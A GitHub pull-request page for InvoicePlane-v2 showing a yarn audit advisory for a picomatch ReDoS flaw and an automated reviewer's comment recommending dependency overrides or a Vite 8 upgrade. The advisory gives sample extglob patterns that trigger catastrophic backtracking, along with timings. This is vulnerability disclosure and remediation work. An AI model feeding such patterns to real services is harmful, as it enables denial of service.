{"type":"auditAdvisory","data":{"resolution":{"id":1115552,"path":"laravel-vite-plugin>vite-plugin-full-reload>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"2.3.1","paths":["laravel-vite-plugin>vite-plugin-full-reload>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115552,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":"<2.3.2","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 2.3.2 or later","patched_versions":">=2.3.2","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditSummary","data":{"vulnerabilities":{"info":0,"low":0,"moderate":3,"high":5,"critical":0},"dependencies":156,"devDependencies":0,"optionalDependencies":0,"totalDependencies":156}}
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai bot Apr 6, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
# Check latest vite version and its dependency requirements
npm view vite versions --json | jq '.[-5:]'
npm view vite@latest dependencies --json

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 265

🏁 Script executed:

# Check current vite and rollup/rolldown versions in the project
if [ -f package.json ]; then
  echo "=== package.json vite/rollup entries ==="
  grep -E '"(vite|rollup|rolldown|picomatch|laravel-vite-plugin)"' package.json | head -20
fi

if [ -f package-lock.json ]; then
  echo "=== package-lock.json vite version ==="
  jq '.packages."node_modules/vite".version' package-lock.json 2>/dev/null || grep '"vite"' package-lock.json | head -3
fi

# Check what rollup/rolldown the audit found
echo "=== Searching audit report for versions ==="
grep -o '"version":"[^"]*"' audit-report.json | sort -u

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 316

🏁 Script executed:

# Check if rolldown is mentioned in the audit or if it's actually rollup that's vulnerable
grep -E '(rollup|rolldown)' audit-report.json | head -5

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 6882

🌐 Web query:

rolldown vs rollup 2026 vite bundle tool which one used

💡 Result:

In Vite (2026):

  • Vite 8 (released 2026-03-12) uses Rolldown as its bundler (replacing the previous split of esbuild for dev + Rollup for production). [1], [2]
  • Rollup is still relevant mainly for compatibility: Rolldown aims to be largely Rollup-plugin-API compatible, and Vite’s Rolldown integration is documented separately (and has been described as experimental in some contexts). [1], [3], [4]

So, which one is used?

  • If you’re on Vite 8: Rolldown. [1], [2]
  • If you’re on older Vite (pre‑8): production bundling is Rollup. [4]

Sources:
[1] Vite blog – Announcing Vite 8 Beta: The Rolldown-powered Vite
[2] Builder.io – Vite 8… released 2026-03-12… Vite now uses Rolldown as its bundler
[3] Rolldown docs – Designed to replace esbuild and Rollup… drop-in replacement for Rollup in most cases
[4] Vite docs – Rolldown Integration

🏁 Script executed:

# Check vite 7.3 vs 8.0 compatibility and their rollup/picomatch versions
echo "=== Vite 7.3.0 dependencies ==="
npm view vite@7.3.0 dependencies --json 2>/dev/null | jq '.rollup, .picomatch' || npm view vite@7.3.0 peerDependencies --json 2>/dev/null

echo ""
echo "=== Checking if vite 8 is compatible (check for breaking changes) ==="
npm view vite@8.0.4 description

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 231

🏁 Script executed:

# Verify what rollup version vite 7.3.0 pulls and picomatch versions
npm view vite@7.3.0 --json 2>/dev/null | jq '.dependencies | keys[]' | grep -E '(rollup|picomatch)'
npm view vite@7.3.0 --json 2>/dev/null | jq '.dependencies."rollup", .dependencies."picomatch"'

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 111

🌐 Web query:

vite 7 to vite 8 breaking changes migration guide 2026

💡 Result:

Official migration guide (Vite 7 → Vite 8)

  • Follow: “Migration from v7” (Vite 8 docs). [1]
  • Release context / rationale (Rolldown switch, install size, Node support): Vite 8.0 announcement (Mar 12, 2026). [2]

Main breaking changes you’re most likely to hit

1) Toolchain swap: Rollup/esbuild → Rolldown/Oxc (behavior + config)

  • Dependency optimization now uses Rolldown; optimizeDeps.esbuildOptions is deprecated → migrate to optimizeDeps.rolldownOptions. [1]
  • JS transforms now use Oxc; the top-level esbuild config is deprecated → migrate to oxc. [1]
  • JS minification now uses Oxc; if you used esbuild.drop, migrate to build.rolldownOptions.output.minify.compress.drop*. [1]
  • CSS minification defaults to Lightning CSS (you can switch back to esbuild via build.cssMinify: 'esbuild', but then you must install esbuild). [1]

2) CommonJS interop changes (can break default imports)

  • Default import from CJS is now handled consistently (dev/build alignment). This can break packages relying on the old heuristic; temporary fallback: legacy.inconsistentCjsInterop: true (deprecated). [1]

3) Chunk splitting / manualChunks changes

  • build.rollupOptions.output.manualChunks object form removed; function form deprecated → use Rolldown codeSplitting. [1]

4) Module resolution heuristic removed

  • Vite no longer “sniffs” browser vs module fields; it now respects resolve.mainFields order. If you relied on the old behavior, use resolve.alias or patch the dependency. [1]

5) Rollup options renamed / deprecated

  • build.rollupOptionsdeprecated (renamed to build.rolldownOptions)
  • worker.rollupOptionsdeprecated (renamed to worker.rolldownOptions)
  • Some old options are now no-ops (e.g. build.commonjsOptions). [1]

Migration paths recommended by the Vite team

  • Direct: bump vite to ^8 and test.
  • Gradual (recommended for larger apps): move from vite@7rolldown-vite (on v7) to isolate bundler issues → then upgrade to vite@8. [2]

Quick “breaking changes radar” page

  • Vite’s “Breaking Changes” index (ongoing/planned changes & future flags): [3]

Sources: Migration guide [1], Vite 8 announcement (Mar 12, 2026) [2], Vite “Breaking Changes” index [3].

🏁 Script executed:

# Quick check: does laravel-vite-plugin ^1.2 support vite 8?
npm view laravel-vite-plugin@1.2 peerDependencies --json 2>/dev/null || npm view laravel-vite-plugin --json 2>/dev/null | jq '.["dist-tags"], .peerDependencies | select(.)' | head -20

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 104

Seven transitive dependency vulnerabilities remain unaddressed; vite upgrade is constrained by laravel-vite-plugin compatibility.

This PR resolves the axios vulnerability, but the audit report shows 7 remaining issues in transitive dependencies:

Package Version Severity Patched Version
rollup 4.54.0 High ≥4.59.0
picomatch 4.0.3 High/Moderate ≥4.0.4
picomatch 2.3.1 High/Moderate ≥2.3.2

Mitigation options:

  1. Use npm overrides (recommended for vite 7.x):

    "overrides": {
  "rollup": "^4.59.0",
  "picomatch": "^4.0.4"
}

  2. Upgrade vite to 8.x (eliminates rollup CVE via Rolldown migration):
    Note: laravel-vite-plugin@^1.2 only supports vite 5–6, so upgrading vite requires also upgrading the plugin (check for v2.0+ support first).

These affect build-time tooling only (not production runtime).

🧰 Tools
🪛 Biome (2.4.10)

[error] 2-2: End of file expected

(parse)

[error] 3-3: End of file expected

(parse)

[error] 4-4: End of file expected

(parse)

[error] 5-5: End of file expected

(parse)

[error] 6-6: End of file expected

(parse)

[error] 7-7: End of file expected

(parse)

[error] 8-8: End of file expected

(parse)

[error] 9-9: End of file expected

(parse)

🤖 Prompt for AI Agents 
Verify each finding against the current code and only fix it if needed.

In `@audit-report.json` around lines 1 - 9, The audit shows remaining
high/moderate transitive vulnerabilities in rollup (4.54.0) and picomatch (4.0.3
/ 2.3.1); fix by either adding an npm "overrides" entry that forces rollup =>
^4.59.0 and picomatch => ^4.0.4 (ensures vite's transitive rollup/picomatch are
patched), or upgrade vite to 8.x and also bump laravel-vite-plugin to a version
that supports vite 8+ (e.g., laravel-vite-plugin v2+), ensuring the transitive
rollup/picomatch versions are upgraded; apply the overrides in package.json and
run a fresh install, or perform the vite + laravel-vite-plugin upgrade and
re-audit to confirm the advisories are gone.

@nielsdrost7 nielsdrost7 deleted the automated/yarn-update-26 branch April 11, 2026 15:44
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@coderabbitai coderabbitai[bot] coderabbitai[bot] left review comments

Assignees

No one assigned

Labels

automated-pr dependencies yarn

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@nielsdrost7